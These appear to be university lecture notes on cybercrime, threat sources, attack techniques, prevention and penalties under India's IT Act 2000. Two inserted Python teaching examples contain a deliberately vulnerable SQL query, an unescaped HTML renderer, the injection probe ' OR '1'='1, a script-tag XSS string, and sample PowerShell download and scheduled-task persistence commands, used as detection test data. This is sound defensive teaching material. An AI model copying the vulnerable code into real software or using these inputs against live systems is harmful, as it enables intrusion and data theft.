Cyber Crime, Nature of Threat, IT Act
West Bengal State University

Summary: This document discusses the nature of cybercrime, including different types of cybercrimes such as cyber terrorism, cyber extortion, cyber warfare, and internet fraud. It also examines the challenges and preventative measures associated with cybercrime, including awareness training and measures to secure data.
Cybercrime, or computer-oriented crime, is a crime that involves a computer and a network. The computer may have been used in the execution of the crime, or it may be the target. Cybercrime is the use of a computer as a weapon for committing crimes such as fraud, identity theft, or breaches of privacy. Cybercrime, especially through the Internet, has grown in importance as the computer has become central to every field, including commerce, entertainment, and government. Cybercrime may endanger a person's or a nation's security and financial health.

Cybercrime covers a wide range of activities, but these can generally be divided into two categories:

Crimes that target computer networks or devices. These crimes involve threats such as viruses and bugs, and denial-of-service (DoS) attacks.
Crimes that use computer networks to commit other criminal activities. These include cyber stalking, financial fraud and identity theft.

Classification of Cyber Crime:-

Cyber Terrorism:- Cyber terrorism is the use of computers and the Internet to perform violent acts that result in loss of life. This may include different types of activity, carried out through software or hardware, that threaten the lives of citizens. In general, cyber terrorism can be defined as an act of terrorism committed through the use of cyberspace or computer resources.

Cyber Extortion:- Cyber extortion occurs when a website, e-mail server or computer system is subjected to, or threatened with, repeated denial-of-service or other attacks by malicious hackers. These hackers demand large sums of money in return for an assurance that the attacks will stop and for offering "protection".
Cyber Warfare:- Cyber warfare is the use or targeting, in a battle-space or warfare context, of computers, online control systems and networks. It involves both offensive and defensive operations relating to the threat of cyber attacks, espionage and sabotage.

Internet Fraud:- Internet fraud is a type of fraud or deceit that makes use of the Internet and may involve hiding information or providing incorrect information in order to deceive victims out of money or property. Internet fraud is not considered a single, distinctive crime but covers a range of illegal and illicit actions committed in cyberspace.

Cyber Stalking:- This is a kind of online harassment in which the victim is subjected to a barrage of online messages and emails. In this case the stalkers know their victims and, instead of stalking offline, use the Internet to stalk. However, if they notice that cyber stalking is not having the desired effect, they begin offline stalking alongside cyber stalking to make the victims' lives more miserable.

Challenges in Cyber Crime:-

People are unaware of their cyber rights:- Cybercrime usually happens to illiterate people around the world who are unaware of the cyber rights implemented by the government of their country.

Anonymity:- Those who commit cyber crime are anonymous to us, so we cannot do anything against that person.

Fewer cases registered:- Every country in the world faces the challenge of cyber crime, and the rate of cyber crime is increasing day by day, yet many victims do not even register a case of cyber crime. This is a major challenge for us as well as for the authorities.

Mostly committed by well-educated people:- Committing a cyber crime is not a cup of tea for every individual. The person who commits cyber crime is a very technical person, so he knows how to commit the crime without getting caught by the authorities.
No harsh punishment:- In cyber crime there is no harsh punishment in every case. There is harsh punishment in some cases, for example when somebody commits cyber terrorism, but in other cases there is no harsh punishment, and this factor also encourages the person who commits cyber crime.

Prevention of Cyber Crime:-

Below are some points by means of which we can prevent cyber crime:

Use strong passwords:- Maintain a different password and username combination for each account and resist the temptation to write them down. Weak passwords can be easily cracked using attack methods like brute-force attacks and rainbow-table attacks, so make them complex: a combination of letters, numbers and special characters.

Use trusted antivirus on devices:- Always use trustworthy and highly advanced antivirus software on mobile devices and personal computers. This helps prevent different virus attacks on devices.

Keep social media private:- Always keep your social media account data visible only to your friends. Also make sure to accept as friends only people who are known to you.

Keep your device software updated:- Whenever you receive updates for the system software, install them straight away, because the previous version can sometimes be attacked easily.

Use a secure network:- Public Wi-Fi networks are vulnerable. Avoid conducting financial or corporate transactions on these networks.

Never open attachments in spam emails:- One way a computer gets infected by malware and other forms of cybercrime is via email attachments in spam emails. Never open an attachment from a sender you do not know.

Software should be updated:- The operating system should be updated regularly when it comes to internet security; an outdated system becomes a potential threat when cybercriminals exploit flaws in it.

Nature of Threat in Cyber Security:-

What are Cyber Security Threats?
Cybersecurity threats are acts performed by individuals with harmful intent, whose goal is to steal data, cause damage to, or disrupt computing systems. Common categories of cyber threats include malware, social engineering, man-in-the-middle (MitM) attacks, denial of service (DoS), and injection attacks; we describe each of these categories in more detail below. Cyber threats can originate from a variety of sources, from hostile nation states and terrorist groups, to individual hackers, to trusted individuals like employees or contractors who abuse their privileges to perform malicious acts.

Common Sources of Cyber Attacks:-

Cyber threats are getting more sophisticated and intense amid increasing levels of remote work, cloud migration and advanced cyber adversaries. Here are the biggest threats to organizations according to the Secureworks Counter Threat Unit™:

▪ Ransomware remains the primary cyber threat to organizations, with attack numbers rebounding and exceeding historical norms, now with a median dwell time between initial access and payload delivery of just 24 hours. The top initial access vectors for ransomware include scan-and-exploit, stolen credentials, and commodity malware delivered via phishing emails.
▪ Infostealer activity has seen increased use, particularly by ransomware affiliates, and this activity is a significant precursor to ransomware attacks. These malware types steal credentials and other sensitive information, which are then sold on underground marketplaces.
▪ Business email compromise (BEC) is one of the most financially damaging online crimes overall for organizations. It exceeds even ransomware in aggregate, mainly because it is so prolific, even if individual financial losses from BEC may be lower than individual losses from ransomware.
▪ Drive-by downloads have become increasingly popular to deliver malware and as an initial access vector. Two major strains of malware delivered this way are Gootloader and SocGholish, often via compromised websites.
▪ Supply chain attacks have been leveraged by various threat actors, including North Korean state-sponsored groups and ransomware operators, to gain access to the suppliers' customers, maximizing impact with minimal effort.
▪ State-sponsored threat activity continues to be driven by political imperatives, with Russia focusing on Ukraine, North Korea on currency theft, Iran on opposition suppression, and China on cyberespionage.

Sources of Cyber Threats:-

When identifying a cyber threat, it's important to know the adversary and understand the tactics, techniques, and procedures (TTPs) associated with them. The TTPs of threat groups are constantly evolving to avoid detection, but the sources of cyber threats remain the same. There is always a human element: someone who falls for a clever trick. But more importantly, there is also always a motive. Understanding attacker TTPs helps identify the motive behind a cyber threat and act to prevent the likely next steps. The Secureworks CTU™ actively tracks threat groups and their TTPs, making those insights available to customers and using them to rapidly create countermeasures to combat the latest threats.
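As an illustration of how knowledge of attacker TTPs is turned into a countermeasure, here is an added example (not the document's or Secureworks' code) that tags constructed endpoint events with the tactic categories this document lists (persistence, command and control, execution, lateral movement). The event format, the allow-list of "common" ports and the sample events are all assumptions made for the example; the logon type 10 check relies on the Windows meaning of that value (RemoteInteractive, i.e. RDP).

```python
"""Added example: tag constructed endpoint events with tactic categories.
Not code from the original document; event schema and samples are invented."""
from dataclasses import dataclass
from typing import Dict, List

# Assumption for the example: ports a proxy expects to see. Anything else
# above 1024 is treated as "uncommon", matching the C2 description in the text.
COMMON_PORTS = {80, 443, 53, 22, 25}


@dataclass
class Event:
    kind: str                 # "process", "netconn" or "logon"
    host: str                 # host the event was recorded on
    process: str = ""         # image name for process events
    cmdline: str = ""         # full command line for process events
    dst_port: int = 0         # destination port for netconn events
    logon_type: int = 0       # Windows logon type; 10 = RemoteInteractive (RDP)
    src_host: str = ""        # originating host for logon events


def tag_tactics(ev: Event) -> List[str]:
    """Return the tactic categories a single event matches (may be empty)."""
    tactics: List[str] = []
    proc = ev.process.lower()
    cmd = ev.cmdline.lower()
    if ev.kind == "process":
        # Persistence: a scheduled task survives reboots and credential changes
        if proc == "schtasks.exe" and "/create" in cmd:
            tactics.append("Persistence")
        # Execution: PowerShell used to fetch additional tooling from the network
        if proc in ("powershell.exe", "pwsh.exe") and any(
            marker in cmd for marker in ("downloadstring", "downloadfile", "invoke-webrequest")
        ):
            tactics.append("Execution")
    elif ev.kind == "netconn":
        # Command and control: outbound traffic on a high, uncommon port
        if ev.dst_port > 1024 and ev.dst_port not in COMMON_PORTS:
            tactics.append("Command and control")
    elif ev.kind == "logon":
        # Lateral movement: RDP logon arriving from another workstation
        if ev.logon_type == 10 and ev.src_host and ev.src_host != ev.host:
            tactics.append("Lateral movement")
    return tactics


def triage(events: List[Event]) -> Dict[str, List[str]]:
    """Group matched tactics per host so an analyst sees the chain at a glance."""
    findings: Dict[str, set] = {}
    for ev in events:
        for tactic in tag_tactics(ev):
            findings.setdefault(ev.host, set()).add(tactic)
    return {host: sorted(tactics) for host, tactics in findings.items()}


# Constructed sample events (not real telemetry); example.invalid is a reserved name
SAMPLE_EVENTS = [
    Event("process", "ws01", "schtasks.exe",
          'schtasks.exe /create /tn "Updater" /tr "C:\\Users\\Public\\u.exe" /sc onstart'),
    Event("netconn", "ws01", dst_port=4444),
    Event("process", "ws02", "powershell.exe",
          'powershell.exe -NoProfile -Command "Invoke-WebRequest http://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip"'),
    Event("logon", "srv01", logon_type=10, src_host="ws01"),
    Event("netconn", "ws02", dst_port=443),          # ordinary HTTPS, no tag
    Event("logon", "srv01", logon_type=2, src_host=""),  # local console logon, no tag
]

if __name__ == "__main__":
    for host, tactics in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(tactics))
```

The port heuristic alone produces false positives (many legitimate services use high ports), which is why a real deployment feeds events into a SIEM and correlates several weak signals per host, as the `triage` function sketches, rather than alerting on any single rule.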
Most Common Sources of Cyber Threats:-

Criminal Groups:- Use cyber threats to steal money and information, through phishing, social engineering, malicious software or other means.
Hackers:- Individuals, groups or organizations who compromise data with malicious intent.
Hacktivists:- Use cyberattacks to express social, environmental, or political agendas, often targeting corporations, governments, and other high-profile entities.
Insider Threats:- People who work within an organization and may intentionally or inadvertently compromise cybersecurity.
Corporate Spies:- Business rivals who may employ tactics to steal information or disrupt services.
Nation States:- Governments that use cyber threats to spy on other nations or disrupt their activities.
Terrorist Groups:- Use cyber threats to steal information, disrupt governmental operations or spread fear.
Data Brokers:- Collect and sell user information without explicit consent, often through underground marketplaces.

Cyber Attack Techniques:-

While many types of cyber attack are possible, typical adversary attack techniques and tactics can be grouped within a matrix that includes the following categories:

Initial access includes techniques used to attain a foothold within a network, like targeted spear phishing, configuration weaknesses in public-facing systems, or exploiting vulnerabilities.
Command and control involves techniques leveraged by attackers to communicate with a system under their control; for example, an attacker communicating with a system over high-numbered or uncommon ports to evade detection by proxies and security appliances.
Collection includes tactics used by adversaries to gather and consolidate the information they were targeting as part of their goals.
Persistence includes techniques that enable an adversary to maintain access to the target system, even following credential changes and reboots; for example, an attacker creating a scheduled task that runs their code on reboot or at a specific time.
Defense evasion includes techniques used by attackers to avoid detection. These include hiding malicious code within trusted folders and processes, disabling security software, or obfuscating adversary code.
Execution involves techniques deployed to run code on a target system; for instance, an attacker running a PowerShell script to download additional attacker tools or scan other systems.
Discovery includes techniques used by attackers to gain information about networks and systems that they are looking to use for their tactical advantage.
Credential access includes techniques deployed on networks and systems to steal usernames and credentials for reuse.
Impact includes techniques leveraged by attackers to affect the availability of data, systems, and networks. It includes denial-of-service attacks and data- or disk-wiping software.
Lateral movement involves tactics that enable attackers to move from one system to another within a network. Some common techniques include abuse of the Remote Desktop Protocol or pass-the-hash methods of authenticating users.
Exfiltration includes tactics utilized to move data from a compromised network to a system or network that's under the attacker's complete control.
Privilege escalation involves techniques utilized by adversaries to gain high-level privileges on a system, like root or local admin.

When a criminal is trying to hack an organization, they won't try something novel unless absolutely necessary. They draw upon common hacking techniques that are known to be highly effective, such as malware or phishing. Whether you're trying to make sense of the latest data-breach headline in the news or analyzing an incident in your own organization, it helps to understand the different cyberattack vectors.

Malware:- Malware refers to various forms of harmful software, such as viruses and ransomware.
Once it is on your computer, it can wreak all sorts of havoc, from taking control of your machine, to monitoring your actions and keystrokes, to silently sending all sorts of confidential data from your computer or network to the attacker's home base. Attackers use a variety of methods to get malware onto your computer, but at some stage it often requires the user to take an action to install it. This can include clicking a link to download a file, or opening an email attachment that may look harmless (like a document or PDF) but actually contains a hidden malware installer.

Ransomware:- Ransomware is a form of malware that encrypts data on infected IT systems. It demands a ransom in exchange for a code that will, hopefully, decrypt the infected system. The ransom payment usually goes to an anonymous address using Bitcoin.

Adware:- Adware is a type of malware that displays unwanted ads on end-user devices to generate revenue from advertisers. It is often installed on user devices after tricking people into clicking a link. Adware then displays the ads and simulates user clicks to defraud advertisers into thinking that legitimate users are interacting with their ads; the advertisers then pay the cybercriminals for these clicks.

Crypto-Jacking:- Crypto-jacking is a type of malware that uses the resources of infected IT systems to "mine" cryptocurrencies. It steals the attacked system's computing resources by running at high load to generate income for the remote attackers, who then make money from the sale of the cryptocurrencies generated on the infected system.

Phishing:- In a phishing attack, an attacker may send you an email that appears to be from someone you trust, like your boss or a company you do business with. The email will seem legitimate, and it will have some urgency to it (e.g. "fraudulent activity has been detected on your account"). In the email, there may be an attachment to open or a link to click.
Upon opening the malicious attachment, you unknowingly install malware on your computer. If you click the link, it may send you to a legitimate-looking website that asks you to log in to access an important file, except the website is actually a trap used to capture your credentials.

Spear Phishing:- Spear phishing is a highly targeted variant of phishing that uses a fake email or message from a supposedly important individual to trick a person within the same organization or a partner organization. Spear phishing attempts rely on the extra authenticity, albeit impostor authenticity, of the sender to trick people into providing information they shouldn't.

SQL Injection Attack:- A structured query language (SQL) injection attack specifically targets servers storing critical website and service data. It uses malicious code to get the server to divulge information it normally wouldn't. SQL is a programming language used to communicate with databases, which can store private customer information such as credit card numbers, usernames and passwords (credentials), or other personally identifiable information (PII), all tempting and lucrative targets for an attacker.

Cross-Site Scripting (XSS):- Cross-site scripting (XSS) attacks also involve injecting malicious code into a website, but in this case the website itself is not being attacked. Instead, the malicious code only runs in the user's browser when they visit the attacked website, where it directly targets the visitor. One of the most common ways an attacker can deploy an XSS attack is by injecting malicious code into a comment or a script that could run automatically.

Botnets:- Botnets are widespread groups of devices that have been compromised and hijacked by cybercriminals. The threat actors use them to target IT systems with distributed DoS attacks or other attack types.
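The two injection attacks just described, SQL injection and cross-site scripting, come down to the same root cause: untrusted input is spliced into a query or a page where the interpreter cannot tell data from code. The following added example (not from the original document) shows each as the vulnerable function beside its hardened form, and also builds the kind of content security policy the "XSS Attack Prevention" point later in the text recommends. The table schema, the sample rows and the host name `cdn.example.invalid` are constructed for the example.

```python
"""Added example: SQL injection and XSS, vulnerable form beside the fix.
Not code from the original document; schema, rows and hosts are invented."""
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a customer database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "hash-a", "1234"), ("bob", "hash-b", "9876")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # BUG (kept on purpose): the input becomes part of the SQL text, so a quote
    # in the input changes the query's structure instead of just its data.
    query = f"SELECT username, card_last4 FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # Parameter binding: the value travels separately from the query text, so
    # whatever the string contains, it is only ever compared as a value.
    return conn.execute(
        "SELECT username, card_last4 FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_comment_vulnerable(comment: str) -> str:
    # BUG (kept on purpose): raw user text is concatenated into the HTML, so
    # a comment containing markup is executed by every visitor's browser.
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment: str) -> str:
    # Output encoding: <, >, &, and quotes become entities, so the browser
    # renders the comment as text no matter what it contains.
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def content_security_policy(trusted_script_hosts: List[str]) -> str:
    """Header value allowing scripts only from this origin and the listed hosts.
    Inline scripts are not in the list, so an injected <script> would not run
    even if encoding were missed somewhere."""
    script_src = " ".join(["'self'", *trusted_script_hosts])
    return f"default-src 'self'; script-src {script_src}; object-src 'none'; base-uri 'self'"


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"          # classic textbook input that breaks out of the quotes
    print("vulnerable:", lookup_vulnerable(db, probe))   # every row comes back
    print("safe:      ", lookup_safe(db, probe))         # nothing matches that literal name
    print(render_comment_safe("<script>alert(1)</script>"))
    print("Content-Security-Policy:", content_security_policy(["https://cdn.example.invalid"]))
```

Two layers are deliberately shown for XSS: encoding at the point of output is the primary defence, and the CSP header is the backstop the document's prevention section describes, limiting which sources a browser will execute scripts from if an encoding gap is ever missed.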
Denial-of-Service (DoS):- Denial-of-service (DoS) attacks flood a website with more traffic than it's built to handle, thereby overloading the site's server and making it near-impossible to serve content to visitors. It's possible for a denial of service to occur for non-malicious reasons, for example if a massive news story breaks and a news organization's site is overloaded with traffic from people trying to learn more about the story.

Man-in-the-Middle Attack:- A man-in-the-middle (MITM) attack occurs when cybercriminals intercept and alter network traffic flowing between IT systems. The MITM attacker impersonates both sender and receiver on the network. It aims to trick both into sending unencrypted data that the attacker intercepts and can use for further attacks or financial gain.

Session Hijacking:- Session hijacking occurs when an attacker captures the unique, and private, session ID and poses as the computer making a request, allowing them to log in as an unsuspecting user and gain access to unauthorized information on the web server. If everything goes as it should during an internet session, web servers respond to your various requests by giving you the information you're attempting to access.

Credential Reuse:- Credential reuse occurs when someone uses the same credentials on multiple websites. It can make life easier in the moment, but can come back to haunt that user later on. Even though security best practices universally recommend unique passwords for all applications and websites, many people still reuse their passwords. This is a fact attackers will readily exploit, turning those reused passwords into compromised credentials.

Not all cyber threats originate from external sources. Data and other sensitive information like login credentials can leak from inside organizations. This can occur via malicious staff activity or, more frequently, due to an unintended action.
An example of such a mistake could be sending an email containing an unencrypted attachment to the wrong recipient.

How to Prevent Cyberattacks:-

We could cover thousands of tactics and tips for preventing cyberattacks at scale, but let's zoom in and take a look at some key examples:

Phishing Awareness Training:- Educate employees on why phishing is harmful and empower them to detect and report phishing attempts. This type of training includes emailing simulated phishing campaigns to employees, monitoring results, reinforcing training, and improving on simulation results. Ongoing security awareness training for staff is also vital, so they know how to spot the most recent versions of suspicious emails, messages, or websites.

Encrypt Data:- All data at rest on servers or devices and in transit over the network should be encrypted. If an attacker does get access to data or intercepts it, strong encryption should render it unreadable.

Compromised Credentials Detection:- Leverage user and entity behavior analytics (UBA) to create a baseline for normal activity on your network. Then monitor how administrator and service accounts are being used, which users are inappropriately sharing credentials, and whether an attacker is already expanding from the initial network compromise to move around and infiltrate other systems.

Use Multi-Factor Authentication:- Implementing multi-factor authentication (MFA) for all systems is a crucial best practice. Requiring an additional piece of information in combination with a username and password protects systems if login details are exposed to cybercriminals. Additional tokens, specific device requirements, and biometrics are all examples of MFA factors that can be leveraged when logging into IT systems.

Ransomware Prevention:- Create a three-point plan to prevent ransomware attacks.
This includes minimizing the attack surface, mitigating potential impact once exposure has been detected, and debriefing to pinpoint gaps in the existing plan. From there, teams can rebuild systems, quarantine endpoints, change credentials, and lock compromised accounts.

Use Endpoint Protection:- End users are frequent targets for cybercriminals, both on their devices and via social-engineering attacks. All end-user devices should have endpoint security protection software deployed. This should integrate with a wider security information and event management (SIEM) tool that allows for organization-wide monitoring and analysis of threats.

XSS Attack Prevention:- Institute a filtering policy through which all external data must pass. This will help to catch malicious scripts before they can become a problem. This leads into creating a wider content security policy that can leverage a list of trusted sources that are able to access your web applications.

Threat Intelligence Program:- Create a central hub that feeds all security-organization functions with knowledge and data on the highest-priority threats. Organizations rely heavily on automation to help scale a threat intelligence program by continuously feeding data into security devices and processes, without the need for human intervention.

Implement Network Deception Technologies:- Deception technologies place "dummy" applications, databases, and other IT systems onto a network. Any cyberattackers who breach the external firewalls will be tricked into thinking they have access to internal systems. In reality, the dummy systems are intended as honeypots that allow security teams to monitor the attacker's activities and gather data without exposing the production systems.

Mobile Device Management Solution:- A lot of business activity now happens on laptops, smartphones, and tablets, and many people use laptops for their work.
The mobile nature of all these devices means they are at high risk of being lost or stolen. All mobile devices (including laptops) should be enrolled and managed in a mobile device management (MDM) solution. If a device is lost or stolen, it can be quickly wiped so that unauthorized users cannot access any data.

IT Act:-

The Information Technology Act, 2000, also known as the IT Act, is an act proposed by the Indian Parliament and reported on 17th October 2000. This Information Technology Act is based on the United Nations Model Law on Electronic Commerce 1996 (UNCITRAL Model), which was recommended by the General Assembly of the United Nations by a resolution dated 30th January, 1997. It is the most important law in India dealing with cybercrime and e-commerce. The main objective of this act is to enable lawful and trustworthy electronic, digital and online transactions and to alleviate or reduce cybercrimes.

The IT Act has 13 chapters and 94 sections. The last four sections, section 91 to section 94, deal with amendments to the Indian Penal Code 1860. The IT Act, 2000 has two schedules:

First Schedule: deals with documents to which the Act shall not apply.
Second Schedule: deals with electronic signatures or electronic authentication methods.

The offences and the punishments in the IT Act 2000:

The offences and punishments that fall under the IT Act, 2000 are as follows:

Tampering with computer source documents.
Directions of the Controller to a subscriber to extend facilities to decrypt information.
Publishing of information which is obscene in electronic form.
Penalty for breach of confidentiality and privacy.
Hacking for malicious purposes.
Penalty for publishing a Digital Signature Certificate false in certain particulars.
Penalty for misrepresentation.
Confiscation.
Power to investigate offences.
Protected systems.
Penalties or confiscation not to interfere with other punishments.
Act to apply to offences or contraventions committed outside India.
Publication for fraudulent purposes.
Power of the Controller to give directions.

Sections and Punishments under the Information Technology Act, 2000 are as follows:

Section 43: This section of the IT Act, 2000 states that any act of destroying, altering or stealing a computer system/network, or deleting data with malicious intent, without authorization from the owner of the computer, is liable for payment to the owner as compensation for damages.

Section 43A: This section of the IT Act, 2000 states that any corporate body dealing with sensitive information that fails to implement reasonable security practices, causing loss to another person, will also be liable to pay compensation to the affected party.

Section 66: Hacking of a computer system with malicious intent, such as fraud, is punishable with 3 years' imprisonment or a fine of Rs. 5,00,000 or both.

Section 66 B, C, D: Fraud or dishonesty in using or transmitting information, or identity theft, is punishable with 3 years' imprisonment or a fine of Rs. 1,00,000 or both.

Section 66 E: Violation of privacy by transmitting an image of a private area is punishable with 3 years' imprisonment or a fine of Rs. 2,00,000 or both.

Section 66 F: Cyber terrorism affecting the unity, integrity, security or sovereignty of India through a digital medium is punishable with life imprisonment.

Section 67: Publishing obscene information or pornography, or transmission of obscene content in public, is punishable with imprisonment up to 5 years or a fine of Rs. 10,00,000 or both.